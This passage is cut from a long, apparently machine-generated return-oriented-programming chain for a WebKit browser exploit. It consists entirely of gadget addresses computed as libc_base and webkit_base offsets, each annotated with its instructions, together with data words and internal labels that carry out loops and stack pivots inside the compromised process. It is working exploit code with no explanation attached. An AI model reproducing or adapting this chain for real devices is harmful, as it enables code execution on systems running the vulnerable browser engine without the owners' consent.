set_gadget(libc_base+759608,); //pop rax
//L11092:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+507936, //L11093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11093:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11095:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+508056, //L11098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+508040, //L11096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11096:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11098:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+508232, //L11101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+508248, //L11102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+508200, //L11099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+508216, //L11100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11099:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11100:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11101:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11102:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+508408, //L11106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+508376, //L11104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+508392, //L11105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11103:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11104:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11105:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11106:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+508496, //L11107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+508512, //L11108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11107:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11108:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+508688, //L11110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+508704, //L11111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+508672, //L11109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11109:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11110:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11111:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+508816, //L11113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+508864, //L11116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+508832, //L11114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11113:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11114:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11115:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11116:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+508976, //L11117+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+508968, //L11117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11117:
db([0, 0]); // 0x0
set_gadgets([
ropchain+508992, //L11117+24
ropchain+509464, //L11112
libc_base+764760, //pop rsi
ropchain+509032, //L11118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11118:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11120:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+509152, //L11123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+509136, //L11121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11121:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11123:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+509328, //L11126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+509344, //L11127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+509296, //L11124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+509312, //L11125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11124:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11125:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11126:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11127:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+509440, //L11130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+509424, //L11129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11129:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11130:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+509920, //L11128
//L11112:
libc_base+764760, //pop rsi
ropchain+509504, //L11131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11131:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11133:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+509624, //L11136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+509608, //L11134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11134:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11136:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+509800, //L11139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+509816, //L11140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+509768, //L11137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+509784, //L11138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11137:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11138:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11139:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11140:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+509912, //L11142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+509896, //L11141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11141:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11142:
db([0, 0]); // 0x0
//L11128:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+510016, //L11145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+510000, //L11144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11143:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11144:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11145:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+510080, //L11146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11146:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11148:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+510160, //L11149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11149:
db([0, 0]); // 0x0
//L11071:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+510208, //L11151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11151:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11153:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+510328, //L11156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+510312, //L11154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11154:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11156:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+510504, //L11159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+510520, //L11160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+510472, //L11157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+510488, //L11158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11157:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11158:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11159:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11160:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+510616, //L11162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+510600, //L11161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11161:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11162:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11163:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11164:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L11165:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+510816, //L11167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11167:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+510872, //L11168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11168:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+511008, //L11172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+510992, //L11171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11170:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11172:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+511128, //L11175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+511096, //L11173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11173:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11174:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11175:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+511264, //L11177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+511280, //L11178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+511248, //L11176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11176:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11177:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11178:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+511392, //L11180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+511440, //L11183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+511408, //L11181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11180:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11181:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11182:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11183:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+511552, //L11184+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+511544, //L11184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11184:
db([0, 0]); // 0x0
set_gadgets([
ropchain+511568, //L11184+24
ropchain+515592, //L11179
//L11185:
libc_base+764760, //pop rsi
ropchain+511608, //L11186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11186:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11188:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+511728, //L11191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+511712, //L11189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11189:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11191:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+511904, //L11194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+511920, //L11195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+511872, //L11192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+511888, //L11193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11192:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11193:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11194:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11195:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+512016, //L11197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+512000, //L11196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11196:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11197:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+512104, //L11199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11198:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11199:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+512160, //L11200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11200:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11202:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+512240, //L11204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+512376, //L11207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+512360, //L11206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11205:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11206:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11207:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+512480, //L11209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+512464, //L11208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11208:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11209:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+512560, //L11210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11210:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11212:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+512680, //L11215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+512664, //L11213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11213:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11215:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+512856, //L11218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+512872, //L11219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+512824, //L11216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+512840, //L11217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11216:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11217:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11218:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11219:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+513032, //L11223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+513000, //L11221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+513016, //L11222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11220:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11221:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11222:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11223:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+513120, //L11224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+513136, //L11225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11224:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11225:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+513312, //L11227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+513328, //L11228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+513296, //L11226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11226:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11227:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11228:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+513440, //L11230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+513488, //L11233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+513456, //L11231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11230:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11232:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11233:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+513600, //L11234+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+513592, //L11234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11234:
db([0, 0]); // 0x0
set_gadgets([
ropchain+513616, //L11234+24
ropchain+515560, //L11229
libc_base+764760, //pop rsi
ropchain+513656, //L11235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11235:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11237:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+513776, //L11240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+513760, //L11238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11238:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11240:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+513920, //L11243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+513888, //L11241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
